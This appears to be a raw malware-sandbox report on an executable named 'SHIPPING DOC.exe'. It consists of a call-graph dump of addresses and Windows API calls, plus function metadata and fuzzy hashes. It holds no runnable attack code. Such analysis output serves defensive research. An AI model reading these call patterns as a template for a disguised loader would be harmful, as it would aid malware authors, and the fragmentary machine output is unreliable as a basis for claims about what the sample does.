_free 46 API calls 87765->87766 87766->87764 87768 41d80a _raise 87767->87768 87769 41d812 87768->87769 87770 41d82d 87768->87770 87807 417f8a 46 API calls __getptd_noexit 87769->87807 87771 41d839 87770->87771 87777 41d873 87770->87777 87809 417f8a 46 API calls __getptd_noexit 87771->87809 87774 41d817 87808 417f77 46 API calls __getptd_noexit 87774->87808 87776 41d83e 87810 417f77 46 API calls __getptd_noexit 87776->87810 87779 41ae56 ___lock_fhandle 48 API calls 87777->87779 87781 41d879 87779->87781 87780 41d846 87811 417f25 10 API calls _raise 87780->87811 87782 41d893 87781->87782 87783 41d887 87781->87783 87812 417f77 46 API calls __getptd_noexit 87782->87812 87792 41d762 87783->87792 87787 41d81f _raise 87787->87758 87788 41d88d 87813 41d8ba LeaveCriticalSection __unlock_fhandle 87788->87813 87790->87750 87791->87747 87814 41aded 87792->87814 87794 41d7c8 87827 41ad67 47 API calls 2 library calls 87794->87827 87796 41d772 87796->87794 87798 41aded __close_nolock 46 API calls 87796->87798 87806 41d7a6 87796->87806 87797 41d7d0 87800 41d7f2 87797->87800 87828 417f9d 46 API calls 3 library calls 87797->87828 87801 41d79d 87798->87801 87799 41aded __close_nolock 46 API calls 87802 41d7b2 CloseHandle 87799->87802 87800->87788 87804 41aded __close_nolock 46 API calls 87801->87804 87802->87794 87805 41d7be GetLastError 87802->87805 87804->87806 87805->87794 87806->87794 87806->87799 87807->87774 87808->87787 87809->87776 87810->87780 87811->87787 87812->87788 87813->87787 87815 41ae12 87814->87815 87816 41adfa 87814->87816 87818 417f8a __read 46 API calls 87815->87818 87821 41ae51 87815->87821 87817 417f8a __read 46 API calls 87816->87817 87819 41adff 87817->87819 87820 41ae23 87818->87820 87822 417f77 _raise 46 API calls 87819->87822 87823 417f77 _raise 46 API calls 87820->87823 87821->87796 87824 41ae07 87822->87824 87825 41ae2b 87823->87825 87824->87796 87826 417f25 _raise 10 API calls 87825->87826 87826->87824 87827->87797 87828->87800 87830 414c82 _raise 87829->87830 87831 414cc3 87830->87831 87832 414cbb _raise 87830->87832 87835 414c96 __recalloc 87830->87835 87833 415471 __lock_file 47 API calls 87831->87833 87832->87500 87834 414ccb 87833->87834 87842 414aba 87834->87842 87856 417f77 46 API calls __getptd_noexit 87835->87856 87837 414cb0 87857 417f25 10 API calls _raise 87837->87857 87843 414af2 87842->87843 87846 414ad8 __recalloc 87842->87846 87858 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87843->87858 87844 414ae2 87909 417f77 46 API calls __getptd_noexit 87844->87909 87846->87843 87846->87844 87849 414b2d 87846->87849 87849->87843 87851 414c38 __recalloc 87849->87851 87852 414139 __flush 46 API calls 87849->87852 87859 41dfcc 87849->87859 87889 41d8f3 87849->87889 87911 41e0c2 46 API calls 3 library calls 87849->87911 87912 417f77 46 API calls __getptd_noexit 87851->87912 87852->87849 87854 414ae7 87910 417f25 10 API calls _raise 87854->87910 87856->87837 87857->87832 87858->87832 87860 41dfd8 _raise 87859->87860 87861 41dfe0 87860->87861 87862 41dffb 87860->87862 87982 417f8a 46 API calls __getptd_noexit 87861->87982 87863 41e007 87862->87863 87868 41e041 87862->87868 87984 417f8a 46 API calls __getptd_noexit 87863->87984 87866 41dfe5 87983 417f77 46 API calls __getptd_noexit 87866->87983 87867 41e00c 87985 417f77 46 API calls __getptd_noexit 87867->87985 87871 41e063 87868->87871 87872 41e04e 87868->87872 87874 41ae56 ___lock_fhandle 48 API calls 87871->87874 87987 417f8a 46 API calls __getptd_noexit 87872->87987 87873 41dfed _raise 87873->87849 87877 41e069 87874->87877 87875 41e014 87986 417f25 10 API calls _raise 87875->87986 87880 41e077 87877->87880 87881 41e08b 87877->87881 87878 41e053 87988 417f77 46 API calls __getptd_noexit 87878->87988 87913 41da15 87880->87913 87989 417f77 46 API calls __getptd_noexit 87881->87989 87885 41e090 87990 417f8a 46 API calls __getptd_noexit 87885->87990 87886 41e083 87991 41e0ba LeaveCriticalSection __unlock_fhandle 87886->87991 87890 41d900 87889->87890 87894 41d915 87889->87894 87995 417f77 46 API calls __getptd_noexit 87890->87995 87892 41d905 87996 417f25 10 API calls _raise 87892->87996 87895 41d94a 87894->87895 87900 41d910 87894->87900 87992 420603 87894->87992 87897 414139 __flush 46 API calls 87895->87897 87898 41d95e 87897->87898 87899 41dfcc __read 59 API calls 87898->87899 87901 41d965 87899->87901 87900->87849 87901->87900 87902 414139 __flush 46 API calls 87901->87902 87903 41d988 87902->87903 87903->87900 87904 414139 __flush 46 API calls 87903->87904 87905 41d994 87904->87905 87905->87900 87906 414139 __flush 46 API calls 87905->87906 87907 41d9a1 87906->87907 87908 414139 __flush 46 API calls 87907->87908 87908->87900 87909->87854 87910->87843 87911->87849 87912->87854 87914 41da31 87913->87914 87915 41da4c 87913->87915 87917 417f8a __read 46 API calls 87914->87917 87916 41da5b 87915->87916 87918 41da7a 87915->87918 87919 417f8a __read 46 API calls 87916->87919 87920 41da36 87917->87920 87923 41da98 87918->87923 87934 41daac 87918->87934 87922 41da60 87919->87922 87921 417f77 _raise 46 API calls 87920->87921 87935 41da3e 87921->87935 87925 417f77 _raise 46 API calls 87922->87925 87926 417f8a __read 46 API calls 87923->87926 87924 41db02 87928 417f8a __read 46 API calls 87924->87928 87927 41da67 87925->87927 87929 41da9d 87926->87929 87930 417f25 _raise 10 API calls 87927->87930 87931 41db07 87928->87931 87932 417f77 _raise 46 API calls 87929->87932 87930->87935 87936 417f77 _raise 46 API calls 87931->87936 87933 41daa4 87932->87933 87938 417f25 _raise 10 API calls 87933->87938 87934->87924 87934->87935 87937 41dae1 87934->87937 87939 41db1b 87934->87939 87935->87886 87936->87933 87937->87924 87942 41daec ReadFile 87937->87942 87938->87935 87941 416b04 __malloc_crt 46 API calls 87939->87941 87943 41db31 87941->87943 87944 41dc17 87942->87944 87945 41df8f GetLastError 87942->87945 87948 41db59 87943->87948 87949 41db3b 87943->87949 87944->87945 87952 41dc2b 87944->87952 87946 41de16 87945->87946 87947 41df9c 87945->87947 87957 417f9d __dosmaperr 46 API calls 87946->87957 87961 41dd9b 87946->87961 87950 417f77 _raise 46 API calls 87947->87950 87953 420494 __lseeki64_nolock 48 API calls 87948->87953 87951 417f77 _raise 46 API calls 87949->87951 87955 41dfa1 87950->87955 87956 41db40 87951->87956 87952->87961 87962 41dc47 87952->87962 87965 41de5b 87952->87965 87954 41db67 87953->87954 87954->87942 87958 417f8a __read 46 API calls 87955->87958 87959 417f8a __read 46 API calls 87956->87959 87957->87961 87958->87961 87959->87935 87960 413748 _free 46 API calls 87960->87935 87961->87935 87961->87960 87963 41dcab ReadFile 87962->87963 87970 41dd28 87962->87970 87968 41dcc9 GetLastError 87963->87968 87973 41dcd3 87963->87973 87964 41ded0 ReadFile 87966 41deef GetLastError 87964->87966 87974 41def9 87964->87974 87965->87961 87965->87964 87966->87965 87966->87974 87967 41ddec MultiByteToWideChar 87967->87961 87969 41de10 GetLastError 87967->87969 87968->87962 87968->87973 87969->87946 87970->87961 87971 41dda3 87970->87971 87972 41dd96 87970->87972 87978 41dd60 87970->87978 87971->87978 87979 41ddda 87971->87979 87975 417f77 _raise 46 API calls 87972->87975 87973->87962 87976 420494 __lseeki64_nolock 48 API calls 87973->87976 87974->87965 87977 420494 __lseeki64_nolock 48 API calls 87974->87977 87975->87961 87976->87973 87977->87974 87978->87967 87980 420494 __lseeki64_nolock 48 API calls 87979->87980 87981 41dde9 87980->87981 87981->87967 87982->87866 87983->87873 87984->87867 87985->87875 87986->87873 87987->87878 87988->87875 87989->87885 87990->87886 87991->87873 87993 416b04 __malloc_crt 46 API calls 87992->87993 87994 420618 87993->87994 87994->87895 87995->87892 87996->87900 88000 4148b3 GetSystemTimeAsFileTime __aulldiv 87997->88000 87999 442c6b 87999->87503 88000->87999 88001->87511 88002->87516 88003->87516 88005 45272f __tzset_nolock _wcscpy 88004->88005 88006 414d04 61 API calls __fread_nolock 88005->88006 88007 44afef GetSystemTimeAsFileTime 88005->88007 88008 4528a4 88005->88008 88009 4150d1 81 API calls _fseek 88005->88009 88006->88005 88007->88005 88008->87433 88008->87434 88009->88005 88011 44b1bc 88010->88011 88012 44b1ca 88010->88012 88013 4149c2 116 API calls 88011->88013 88014 44b1e1 88012->88014 88015 4149c2 116 API calls 88012->88015 88016 44b1d8 88012->88016 88013->88012 88045 4321a4 88014->88045 88017 44b2db 88015->88017 88016->87461 88017->88014 88019 44b2e9 88017->88019 88021 44b2f6 88019->88021 88024 414a46 __fcloseall 82 API calls 88019->88024 88020 44b224 88022 44b253 88020->88022 88023 44b228 88020->88023 88021->87461 88049 43213d 88022->88049 88026 44b235 88023->88026 88029 414a46 __fcloseall 82 API calls 88023->88029 88024->88021 88027 44b245 88026->88027 88030 414a46 __fcloseall 82 API calls 88026->88030 88027->87461 88028 44b25a 88031 44b260 88028->88031 88032 44b289 88028->88032 88029->88026 88030->88027 88034 44b26d 88031->88034 88036 414a46 __fcloseall 82 API calls 88031->88036 88059 44b0bf 88032->88059 88037 44b27d 88034->88037 88039 414a46 __fcloseall 82 API calls 88034->88039 88035 44b28f 88068 4320f8 88035->88068 88036->88034 88037->87461 88039->88037 88041 414a46 __fcloseall 82 API calls 88042 44b2a2 88041->88042 88043 414a46 __fcloseall 82 API calls 88042->88043 88044 44b2b2 88042->88044 88043->88044 88044->87461 88046 4321cb 88045->88046 88048 4321b4 __tzset_nolock _memmove 88045->88048 88047 414d04 __fread_nolock 61 API calls 88046->88047 88047->88048 88048->88020 88050 4135bb _malloc 46 API calls 88049->88050 88051 432150 88050->88051 88052 4135bb _malloc 46 API calls 88051->88052 88053 432162 88052->88053 88054 4135bb _malloc 46 API calls 88053->88054 88055 432174 88054->88055 88056 4320f8 46 API calls 88055->88056 88057 432189 88055->88057 88058 432198 88056->88058 88057->88028 88058->88028 88060 44b18e 88059->88060 88061 44b0da 88059->88061 88078 43206e 79 API calls 88060->88078 88061->88060 88063 442caf 61 API calls 88061->88063 88067 44b19d 88061->88067 88076 44b040 61 API calls 88061->88076 88077 442d48 79 API calls 88061->88077 88063->88061 88064 44b194 88064->88035 88067->88035 88069 432109 88068->88069 88074 43210f 88068->88074 88070 413748 _free 46 API calls 88069->88070 88070->88074 88071 413748 _free 46 API calls 88073 432122 88071->88073 88072 432135 88072->88041 88072->88042 88073->88072 88075 413748 _free 46 API calls 88073->88075 88074->88071 88074->88073 88075->88072 88076->88061 88077->88061 88078->88064 88079->87363 88080->87366 88081->87384 88082->87384 88083->87384 88084->87375 88085->87384 88086->87384 88087->87388 88088->87398 88089->87397 88090->87397 88140 410160 88091->88140 88093 41012f GetFullPathNameW 88094 410147 moneypunct 88093->88094 88094->87223 88096 4102cb SHGetDesktopFolder 88095->88096 88098 410333 _wcsncpy 88095->88098 88097 4102e0 _wcsncpy 88096->88097 88096->88098 88097->88098 88099 41031c SHGetPathFromIDListW 88097->88099 88098->87227 88099->88098 88101 4101bb 88100->88101 88103 425f4a 88100->88103 88102 410160 52 API calls 88101->88102 88104 4101c7 88102->88104 88105 4114ab __wcsicoll 58 API calls 88103->88105 88108 425f6e 88103->88108 88144 410200 52 API calls 2 library calls 88104->88144 88105->88103 88107 4101d6 88145 410200 52 API calls 2 library calls 88107->88145 88108->87229 88110 4101e9 88110->87229 88112 40f760 128 API calls 88111->88112 88113 40f584 88112->88113 88114 429335 88113->88114 88115 40f58c 88113->88115 88118 4528bd 118 API calls 88114->88118 88116 40f598 88115->88116 88117 429358 88115->88117 88156 4033c0 113 API calls 7 library calls 88116->88156 88157 434034 86 API calls _wprintf 88117->88157 88120 42934b 88118->88120 88123 429373 88120->88123 88124 42934f 88120->88124 88122 40f5b4 88122->87225 88126 4115d7 52 API calls 88123->88126 88127 431e58 82 API calls 88124->88127 88125 429369 88125->88123 88139 4293c5 moneypunct 88126->88139 88127->88117 88128 42959c 88129 413748 _free 46 API calls 88128->88129 88130 4295a5 88129->88130 88131 431e58 82 API calls 88130->88131 88136 401b10 52 API calls 88136->88139 88139->88128 88139->88136 88146 444af8 88139->88146 88149 44b41c 88139->88149 88158 44c7dd 64 API calls 3 library calls 88139->88158 88159 402780 52 API calls 2 library calls 88139->88159 88160 4022d0 52 API calls moneypunct 88139->88160 88141 410167 _wcslen 88140->88141 88142 4115d7 52 API calls 88141->88142 88143 41017e _wcscpy 88142->88143 88143->88093 88144->88107 88145->88110 88147 4115d7 52 API calls 88146->88147 88148 444b27 _memmove 88147->88148 88148->88139 88150 44b429 88149->88150 88151 4115d7 52 API calls 88150->88151 88156->88122 88157->88125 88158->88139 88159->88139 88160->88139 88162 402539 moneypunct 88161->88162 88163 402417 88161->88163 88162->87233 88163->88162 88164 4115d7 52 API calls 88163->88164 88165 402443 88164->88165 88166 4115d7 52 API calls 88165->88166 88167 4024b4 88166->88167 88167->88162 88168 402880 95 API calls 88167->88168 88190 4022d0 52 API calls moneypunct 88167->88190 88168->88167 88175 401566 88170->88175 88171 401794 88191 40e9a0 90 API calls 88171->88191 88174 4010a0 52 API calls 88174->88175 88175->88171 88175->88174 88176 40167a 88175->88176 88177 4017c0 88176->88177 88192 45e737 90 API calls 3 library calls 88176->88192 88177->87236 88179 40bc70 52 API calls 88178->88179 88185 40d451 88179->88185 88180 40d50f 88195 410600 52 API calls 88180->88195 88182 40d519 88182->87238 88183 40e0a0 52 API calls 88183->88185 88185->88180 88185->88182 88185->88183 88186 401b10 52 API calls 88185->88186 88188 427c01 88185->88188 88193 40f310 53 API calls 88185->88193 88194 40d860 91 API calls 88185->88194 88186->88185 88196 45e737 90 API calls 3 library calls 88188->88196 88190->88167 88191->88176 88192->88177 88193->88185 88194->88185 88195->88182 88196->88182 88197->87251 88198->87252 88200 42c5fe 88199->88200 88251 4091c6 88199->88251 88201 40bc70 52 API calls 88200->88201 88200->88251 88202 42c64e InterlockedIncrement 88201->88202 88203 42c665 88202->88203 88206 42c697 88202->88206 88205 42c672 InterlockedDecrement Sleep InterlockedIncrement 88203->88205 88203->88206 88204 42c737 InterlockedDecrement 88207 42c74a 88204->88207 88205->88203 88205->88206 88206->88204 88208 42c731 88206->88208 88210 408e80 VariantClear 88206->88210 88209 408f40 VariantClear 88207->88209 88208->88204 88211 42c752 88209->88211 88212 42c6cf 88210->88212 88477 410c60 VariantClear moneypunct 88211->88477 88214 45340c 85 API calls 88212->88214 88215 42c6db 88214->88215 88216 402160 52 API calls 88215->88216 88217 42c6e5 88216->88217 88218 45340c 85 API calls 88217->88218 88219 42c6f1 88218->88219 88474 40d200 52 API calls 2 library calls 88219->88474 88221 42c6fb 88251->87311 88258 40afc4 88257->88258 88259 40b156 88257->88259 88260 40afd5 88258->88260 88261 42d1e3 88258->88261 88485 45e737 90 API calls 3 library calls 88259->88485 88265 40a780 201 API calls 88260->88265 88282 40b11a moneypunct 88260->88282 88486 45e737 90 API calls 3 library calls 88261->88486 88264 40b143 88264->87311 88267 40b00a 88265->88267 88266 42d1f8 88270 408f40 VariantClear 88266->88270 88267->88266 88271 40b012 88267->88271 88269 42d4db 88269->88269 88270->88264 88272 40b04a 88271->88272 88273 42d231 VariantClear 88271->88273 88276 40b094 moneypunct 88271->88276 88281 40b05c moneypunct 88272->88281 88487 40e270 VariantClear moneypunct 88272->88487 88273->88281 88274 40b108 88274->88282 88488 40e270 VariantClear moneypunct 88274->88488 88275 42d425 moneypunct 88277 42d45a VariantClear 88275->88277 88275->88282 88276->88274 88276->88275 88277->88282 88279 4115d7 52 API calls 88279->88276 88281->88276 88281->88279 88282->88264 88489 45e737 90 API calls 3 library calls 88282->88489 88284 4096c6 _wcslen 88283->88284 88285 40a70c moneypunct _memmove 88284->88285 88286 4115d7 52 API calls 88284->88286 88491 4013a0 52 API calls 88285->88491 88287 4096fa _memmove 88286->88287 88289 4115d7 52 API calls 88287->88289 88291 40971b 88289->88291 88290 4297aa 88292 4115d7 52 API calls 88290->88292 88291->88285 88293 409749 CharUpperBuffW 88291->88293 88296 40976a moneypunct 88291->88296 88295 4297d1 _memmove 88292->88295 88293->88296 88518 45e737 90 API calls 3 library calls 88295->88518 88303 4097e5 moneypunct 88296->88303 88492 47dcbb 203 API calls 88296->88492 88298 408f40 VariantClear 88299 42ae92 88298->88299 88519 410c60 VariantClear moneypunct 88299->88519 88301 42aea4 88302 409aa2 88302->88295 88305 4115d7 52 API calls 88302->88305 88310 409afe 88302->88310 88303->88295 88303->88302 88304 40a689 88303->88304 88306 4115d7 52 API calls 88303->88306 88308 40c2c0 52 API calls 88303->88308 88309 40a6af moneypunct _memmove 88303->88309 88316 429a46 VariantClear 88303->88316 88317 408f40 VariantClear 88303->88317 88335 4299d9 88303->88335 88339 429abd 88303->88339 88347 40a780 201 API calls 88303->88347 88351 42a452 88303->88351 88493 40c4e0 201 API calls 88303->88493 88495 40ba10 52 API calls 2 library calls 88303->88495 88496 40e270 VariantClear moneypunct 88303->88496 88307 4115d7 52 API calls 88304->88307 88305->88310 88306->88303 88307->88309 88308->88303 88331 4115d7 52 API calls 88309->88331 88311 409b2a 88310->88311 88312 4115d7 52 API calls 88310->88312 88313 429dbe 88311->88313 88374 409b4d moneypunct _memmove 88311->88374 88500 40b400 VariantClear VariantClear moneypunct 88311->88500 88314 429d31 88312->88314 88319 429dd3 88313->88319 88501 40b400 VariantClear VariantClear moneypunct 88313->88501 88322 429d42 88314->88322 88497 44a801 52 API calls 88314->88497 88316->88303 88317->88303 88319->88374 88502 40e1c0 VariantClear moneypunct 88319->88502 88321 40a045 88325 4115d7 52 API calls 88321->88325 88327 40e0a0 52 API calls 88322->88327 88332 40a04c 88325->88332 88333 429d57 88327->88333 88329 42a42f 88506 45e737 90 API calls 3 library calls 88329->88506 88331->88285 88338 408f40 VariantClear 88335->88338 88343 4299e2 88338->88343 88339->87311 88494 410c60 VariantClear moneypunct 88343->88494 88347->88303 88348 402780 52 API calls 88348->88374 88351->88298 88355 40a780 201 API calls 88355->88374 88357 401980 53 API calls 88357->88374 88358 408e80 VariantClear 88358->88374 88363 44a801 52 API calls 88363->88374 88365 41130a 51 API calls __cinit 88365->88374 88366 4115d7 52 API calls 88366->88374 88369 409fd2 88369->88321 88370 42a3f5 88369->88370 88505 47390f VariantClear 88370->88505 88373 409c95 88373->87311 88374->88285 88374->88329 88374->88348 88374->88355 88374->88357 88374->88358 88374->88363 88374->88365 88374->88366 88374->88369 88374->88370 88374->88373 88503 45f508 52 API calls 88374->88503 88504 403e10 53 API calls 88374->88504 88406 40a650 moneypunct 88406->87311 88411 408fff 88410->88411 88424 40900d 88410->88424 88520 403ea0 52 API calls __cinit 88411->88520 88414 42c3f6 88523 45e737 90 API calls 3 library calls 88414->88523 88416 40a780 201 API calls 88416->88424 88417 42c44a 88525 45e737 90 API calls 3 library calls 88417->88525 88419 42c47b 88526 451b42 61 API calls 88419->88526 88421 42c4cb 88528 47faae 240 API calls 88421->88528 88422 42c564 88426 408f40 VariantClear 88422->88426 88424->88414 88424->88416 88424->88417 88424->88419 88424->88421 88424->88422 88428 42c548 88424->88428 88429 409112 88424->88429 88432 4090df 88424->88432 88434 42c528 88424->88434 88437 4090ea 88424->88437 88444 4090f2 moneypunct 88424->88444 88522 4534e3 52 API calls 88424->88522 88524 40c4e0 201 API calls 88424->88524 88426->88444 88427 42c4da 88427->88444 88529 45e737 90 API calls 3 library calls 88427->88529 88531 45e737 90 API calls 3 library calls 88428->88531 88429->88428 88435 40912b 88429->88435 88430 42c491 88430->88444 88527 45e737 90 API calls 3 library calls 88430->88527 88432->88437 88438 408e80 VariantClear 88432->88438 88530 45e737 90 API calls 3 library calls 88434->88530 88435->88444 88521 403e10 53 API calls 88435->88521 88440 408f40 VariantClear 88437->88440 88438->88437 88440->88444 88442 40914b 88443 408f40 VariantClear 88442->88443 88443->88444 88444->87311 88446 40d15f 88445->88446 88448 425c87 88445->88448 88446->87311 88447 425cc7 88448->88447 88449 425ca1 TranslateAcceleratorW 88448->88449 88449->88446 88451 42602f 88450->88451 88454 40d17f 88450->88454 88451->87311 88452 40d18c 88452->87311 88453 42608e IsDialogMessageW 88453->88452 88453->88454 88454->88452 88454->88453 88532 430c46 GetClassLongW 88454->88532 88456->87311 88457->87262 88458->87268 88459->87311 88460->87311 88461->87311 88462->87311 88463->87318 88464->87318 88465->87318 88466->87318 88467->87318 88468->87318 88469->87318 88470->87318 88471->87318 88472->87311 88473->87259 88474->88221 88477->88251 88485->88261 88486->88266 88487->88281 88488->88282 88489->88269 88491->88290 88492->88296 88493->88303 88494->88406 88495->88303 88496->88303 88497->88322 88500->88313 88501->88319 88502->88374 88503->88374 88504->88374 88505->88329 88506->88351 88518->88351 88519->88301 88520->88424 88521->88442 88522->88424 88523->88444 88524->88424 88525->88444 88526->88430 88527->88444 88528->88427 88529->88444 88530->88444 88531->88422 88532->88454 88533 42d154 88537 480a8d 88533->88537 88535 42d161 88536 480a8d 201 API calls 88535->88536 88536->88535 88538 480ae4 88537->88538 88539 480b26 88537->88539 88541 480aeb 88538->88541 88542 480b15 88538->88542 88540 40bc70 52 API calls 88539->88540 88557 480b2e 88540->88557 88544 480aee 88541->88544 88545 480b04 88541->88545 88570 4805bf 201 API calls 88542->88570 88544->88539 88546 480af3 88544->88546 88569 47fea2 201 API calls __itow_s 88545->88569 88568 47f135 201 API calls 88546->88568 88549 40e0a0 52 API calls 88549->88557 88551 408f40 VariantClear 88553 481156 88551->88553 88552 480aff 88552->88551 88554 408f40 VariantClear 88553->88554 88555 48115e 88554->88555 88555->88535 88556 40e710 53 API calls 88556->88557 88557->88549 88557->88552 88557->88556 88558 401980 53 API calls 88557->88558 88560 40c2c0 52 API calls 88557->88560 88561 408e80 VariantClear 88557->88561 88562 480ff5 88557->88562 88563 40a780 201 API calls 88557->88563 88571 45377f 52 API calls 88557->88571 88572 45e951 53 API calls 88557->88572 88573 40e830 53 API calls 88557->88573 88574 47925f 53 API calls 88557->88574 88575 47fcff 201 API calls 88557->88575 88558->88557 88560->88557 88561->88557 88576 45e737 90 API calls 3 library calls 88562->88576 88563->88557 88568->88552 88569->88552 88570->88552 88571->88557 88572->88557 88573->88557 88574->88557 88575->88557 88576->88552 88577 42b14b 88584 40bc10 88577->88584 88579 42b159 88580 4096a0 338 API calls 88579->88580 88581 42b177 88580->88581 88595 44b92d VariantClear 88581->88595 88583 42bc5b 88585 40bc24 88584->88585 88586 40bc17 88584->88586 88587 40bc2a 88585->88587 88588 40bc3c 88585->88588 88589 408e80 VariantClear 88586->88589 88590 408e80 VariantClear 88587->88590 88591 4115d7 52 API calls 88588->88591 88592 40bc1f 88589->88592 88593 40bc33 88590->88593 88594 40bc43 88591->88594 88592->88579 88593->88579 88594->88579 88595->88583 88596 425b2b 88601 40f000 88596->88601 88600 425b3a 88602 4115d7 52 API calls 88601->88602 88603 40f007 88602->88603 88604 4276ea 88603->88604 88610 40f030 88603->88610 88609 41130a 51 API calls __cinit 88609->88600 88611 40f039 88610->88611 88612 40f01a 88610->88612 88640 41130a 51 API calls __cinit 88611->88640 88614 40e500 88612->88614 88615 40bc70 52 API calls 88614->88615 88616 40e515 GetVersionExW 88615->88616 88617 402160 52 API calls 88616->88617 88618 40e557 88617->88618 88641 40e660 88618->88641 88623 427674 88628 4276c6 GetSystemInfo 88623->88628 88626 40e5e0 88630 4276d5 GetSystemInfo 88626->88630 88655 40efd0 88626->88655 88627 40e5cd GetCurrentProcess 88662 40ef20 LoadLibraryA GetProcAddress 88627->88662 88628->88630 88633 40e629 88659 40ef90 88633->88659 88636 40e641 FreeLibrary 88637 40e644 88636->88637 88638 40e653 FreeLibrary 88637->88638 88639 40e656 88637->88639 88638->88639 88639->88609 88640->88612 88642 40e667 88641->88642 88643 42761d 88642->88643 88644 40c600 52 API calls 88642->88644 88645 40e55c 88644->88645 88646 40e680 88645->88646 88647 40e687 88646->88647 88648 427616 88647->88648 88649 40c600 52 API calls 88647->88649 88650 40e566 88649->88650 88650->88623 88651 40ef60 88650->88651 88652 40e5c8 88651->88652 88653 40ef66 LoadLibraryA 88651->88653 88652->88626 88652->88627 88653->88652 88654 40ef77 GetProcAddress 88653->88654 88654->88652 88656 40e620 88655->88656 88657 40efd6 LoadLibraryA 88655->88657 88656->88628 88656->88633 88657->88656 88658 40efe7 GetProcAddress 88657->88658 88658->88656 88663 40efb0 LoadLibraryA GetProcAddress 88659->88663 88661 40e632 GetNativeSystemInfo 88661->88636 88661->88637 88662->88626 88663->88661 88664 425b5e 88669 40c7f0 88664->88669 88668 425b6d 88704 40db10 52 API calls 88669->88704 88671 40c82a 88705 410ab0 6 API calls 88671->88705 88673 40c86d 88674 40bc70 52 API calls 88673->88674 88675 40c877 88674->88675 88676 40bc70 52 API calls 88675->88676 88677 40c881 88676->88677 88678 40bc70 52 API calls 88677->88678 88679 40c88b 88678->88679 88680 40bc70 52 API calls 88679->88680 88681 40c8d1 88680->88681 88682 40bc70 52 API calls 88681->88682 88683 40c991 88682->88683 88706 40d2c0 52 API calls 88683->88706 88685 40c99b 88707 40d0d0 53 API calls 88685->88707 88687 40c9c1 88688 40bc70 52 API calls 88687->88688 88689 40c9cb 88688->88689 88708 40e310 53 API calls 88689->88708 88691 40ca28 88692 408f40 VariantClear 88691->88692 88693 40ca30 88692->88693 88694 408f40 VariantClear 88693->88694 88695 40ca38 GetStdHandle 88694->88695 88696 429630 88695->88696 88697 40ca87 88695->88697 88696->88697 88698 429639 88696->88698 88703 41130a 51 API calls __cinit 88697->88703 88709 4432c0 57 API calls 88698->88709 88700 429641 88710 44b6ab CreateThread 88700->88710 88702 42964f CloseHandle 88702->88697 88703->88668 88704->88671 88705->88673 88706->88685 88707->88687 88708->88691 88709->88700 88710->88702 88711 44b5cb 58 API calls 88710->88711 88712 425b6f 88717 40dc90 88712->88717 88716 425b7e 88718 40bc70 52 API calls 88717->88718 88719 40dd03 88718->88719 88726 40f210 88719->88726 88721 426a97 88723 40dd96 88723->88721 88724 40ddb7 88723->88724 88729 40dc00 52 API calls 2 library calls 88723->88729 88725 41130a 51 API calls __cinit 88724->88725 88725->88716 88730 40f250 RegOpenKeyExW 88726->88730 88728 40f230 88728->88723 88729->88723 88731 425e17 88730->88731 88732 40f275 RegQueryValueExW 88730->88732 88731->88728 88733 40f2c3 RegCloseKey 88732->88733 88734 40f298 88732->88734 88733->88728 88735 40f2a9 RegCloseKey 88734->88735 88736 425e1d 88734->88736 88735->88728 88737 3cf1530 88751 3cef180 88737->88751 88739 3cf1626 88754 3cf1420 88739->88754 88757 3cf2650 GetPEB 88751->88757 88753 3cef80b 88753->88739 88755 3cf1429 Sleep 88754->88755 88756 3cf1437 88755->88756 88758 3cf267a 88757->88758 88758->88753
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 004096C1
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • _memmove.LIBCMT ref: 0040970C
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                      • _memmove.LIBCMT ref: 00409D96
                                                                                                                      • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                      • _memmove.LIBCMT ref: 004297E5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2383988440-0
                                                                                                                      • Opcode ID: c9aeae05f9e297f4f4d27e5cc88271dfec8111064548994f186f59c23e97ced8
                                                                                                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                      • Opcode Fuzzy Hash: c9aeae05f9e297f4f4d27e5cc88271dfec8111064548994f186f59c23e97ced8
                                                                                                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SHIPPING DOC.exe,00000104,?), ref: 00401F4C
                                                                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
